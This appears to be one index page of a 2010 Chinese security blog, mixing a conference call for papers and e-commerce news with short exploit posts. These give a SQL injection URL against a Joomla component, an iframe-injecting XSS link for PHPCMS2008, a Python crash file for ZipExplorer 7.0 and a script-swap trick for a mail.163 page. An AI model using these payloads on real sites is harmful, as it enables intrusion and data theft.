mail.163漏洞

2010/07/04 0:58 | 教主 | 技术文章 | 8 条评论

作者:马骏
伟哥提供的漏洞

http://zhidao.mail.163.com/zhidao/js/upload.js

firebug或者开发人员工具
自己本地放个upload.js的修改版 用firebugs修改引入

本地验证 很容易搞的 不成功的就是人品有问题了
老魔提供的图 阅读全文 »

Tags: , ,

XCon2010 安全焦点信息安全技术峰会议题征集函

2010/06/12 17:23 | 教主 | 业界资讯 | 9 条评论

中国,北京,2010年8月4~5日 (http://xcon.xfocus.net)

XCon 秉承一贯的严谨求实作风竭诚欢迎热爱信息安全技术的人员积极投稿,参加会议,共享精彩盛会。

参加会议对象:
任何热爱信息安全的人士,包括如信息安全专家,信息安全爱好者, 网络
管理工程师,网络安全顾问, CIO,黑客技术发烧友等。

会议地点: 北京歌华开元大酒店 ( http://www.kaiyuanhotels.com/Hotel/Default.aspx?City=PEK&HotelCode=KYBJGH )

征文范围 (不限于所列方向): 阅读全文 »

Tags: , , ,

Joomla com_sar_news SQL注入漏洞

2010/06/02 18:07 | 教主 | 技术文章 | 4 条评论

作者:LyNx
测试环境:Windows XP 2
注入点

http://jiaozhu.org/index.php?option=com_sar_news&id=80[SQL]&sort_by=ordering

示例

http://jiaozhu.org/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering
Tags: , ,

ZipExplorer 7.0 (.zar) 利用工具

2010/06/02 18:02 | 教主 | 工具收集 | 占个座先

作者:TecR0c 

#!/usr/bin/python
dos = "\x41" * 2000
mefile = open('tecr0c.zar','w');
mefile.write(dos);
mefile.close();

利用方法:启动ZipExplorer 7.0,点击:Open,然后打到这个文件的位置,双击打开,完事儿。

Tags: , ,

PHPCMS2008 SP4 网站内容管理系统搜索模块跨站漏洞

2010/06/02 17:57 | 教主 | 技术文章 | 占个座先

转载:SEBUG
影响版本:
phpcms2008 sp4
漏洞的形成是由于搜索没有进行有效的处理,造成跨站漏洞,利用

http://www.phpcms.cn/search/?q=jiaozhu&type=all%22%3E%3Ciframe%20src=HTTP://jiaozhu.org%3E&page=1&order=1

地址自己构造吧,可以利用一下。

Tags: , ,

网店实名制7月1日起实施

2010/06/02 17:52 | 教主 | 业界资讯 | 2 条评论

国家工商总局昨天正式对外发布《网络商品交易及有关服务行为管理暂行办法》,将于7月1日起施行。根据办法,通过网络从事商品交易及有关服务行为的自然人,应当向提供网络交易平台服务的经营者提出申请,提交其姓名和地址等真实身份信息。针对网上交易的特殊性,工商部门将用3年的时间建立全国统一监管平台。
记者发现,与此前的征求意见稿相比,网店准入资格、网站对网店的管理方面变化不大。已注册的企业或个体户开网店的,要在网上标明营业执照等相关信息,而自然人开网店的,要提供姓名和地址等真实身份信息,由网站进行审核,核发证明个人身份信息真实合法的标记,在网页上标明,并建立登记档案定期核实更新。 阅读全文 »

Tags: , , , ,
第 4 页,共 34 页« 最新...23456102030...最旧 »